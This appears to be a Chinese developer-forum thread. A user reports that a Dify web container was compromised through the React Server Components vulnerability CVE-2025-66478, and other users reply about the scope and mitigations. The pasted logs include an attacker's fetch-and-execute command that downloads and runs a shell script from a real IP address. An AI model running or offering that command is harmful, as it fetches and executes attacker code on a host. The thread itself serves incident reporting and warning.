从今天下午 4 点起,云服务器不断报警,下载了 xlg_amd64 、xlg.sh 、get.sh 等奇奇怪怪的脚本。 杀了过了一会又出现了,
最终定位到是 dify 的 web 容器执行的脚本。
一直没仔细看云平台上的告警:CVE-2025-66478 ( https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components )
dify issue 里显示修复了: https://github.com/langgenius/dify/issues/29202
但是晚上我升级到了 1.10.1-fix.1 ,发现还是有这个问题。。请示领导先关服务了。
脚本名字起得都如此凶戾。
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
 |
1
shukuang 14 小时 14 分钟前
默认配置下 React 服务器,通杀漏洞,升级版本是唯一解决途径
|
 |
2
laminux29 13 小时 8 分钟前
|
 |
3
levelworm 10 小时 27 分钟前
能不能发个脚本的代码让我们欣赏一下。
|
 |
4
rick13 6 小时 50 分钟前
笑死我了
|
 |
5
AmericanExpress 6 小时 49 分钟前 via iPhone
|
 |
6
dankai 4 小时 19 分钟前
这脚本名笑死🤣
|
 |
7
x86 4 小时 3 分钟前
命名丝毫不带藏的,笑死
|
 |
8
bingfengfeifei 3 小时 37 分钟前
lobechat 也中招了,这次这个影响范围感觉比之前的 log4j 漏洞大的多
|
 |
9
Wuuuu 2 小时 27 分钟前
很好奇,假如只用 react +其他后端,不用 nextjs ,是不是就没问题了……还是单纯 react 前端也受到影响了……
|
1 |
11
proxychains 2 小时 20 分钟前
笑死了
|
 |
12
Ketteiron 2 小时 18 分钟前
笑死了🤣可以评选今年最佳
|
 |
13
yefee 1 小时 57 分钟前
我们客户服务器也中招了
|
 |
14
crysislinux 1 小时 28 分钟前 via Android
我们倒是没中这个,不过中了之前的供应链投毒。。大家 npm 还是切记要 ignore scripts ,。
|
Select Language